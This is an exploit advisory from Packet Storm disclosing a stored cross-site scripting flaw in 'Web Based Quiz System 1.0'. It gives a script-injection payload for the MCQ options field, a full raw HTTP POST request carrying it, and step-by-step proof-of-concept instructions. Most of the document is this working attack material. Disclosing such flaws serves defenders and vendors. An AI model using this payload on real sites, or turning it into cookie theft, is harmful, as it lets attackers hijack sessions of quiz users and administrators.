Lucene search

K
packetstormPraharsh Kumar SinghPACKETSTORM:161616
HistoryMar 02, 2021 - 12:00 a.m.

Web Based Quiz System 1.0 Cross Site Scripting

2021-03-0200:00:00
Praharsh Kumar Singh
packetstormsecurity.com
267
`# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting  
# Date: 2021-03-02  
# Exploit Author: Praharsh Kumar Singh  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html  
# Software: Web Based Quiz System  
# Version: 1.0  
# Vulnerability Type: Cross-site Scripting  
# Vulnerability: Persistent/Stored XSS  
# Tested on: Parrot OS  
  
# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe  
# in adding questions in options parameter affected from this vulnerability.  
# payload: </script><script >alert(document.cookie)</script>  
  
POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 101  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1  
Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh  
Upgrade-Insecure-Requests: 1  
Sec-GPC: 1  
  
qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c  
  
POC:  
# go to url http://localhost:8080/admin.php  
# login and add question  
# then put the above payload in MCQ options parameter  
# then fill the remaining details  
# then click add  
# go to url http://localhost:8080/login.php  
# then login to user account  
# then attempt the quiz while attempting the quiz xss pop up there..!  
  
`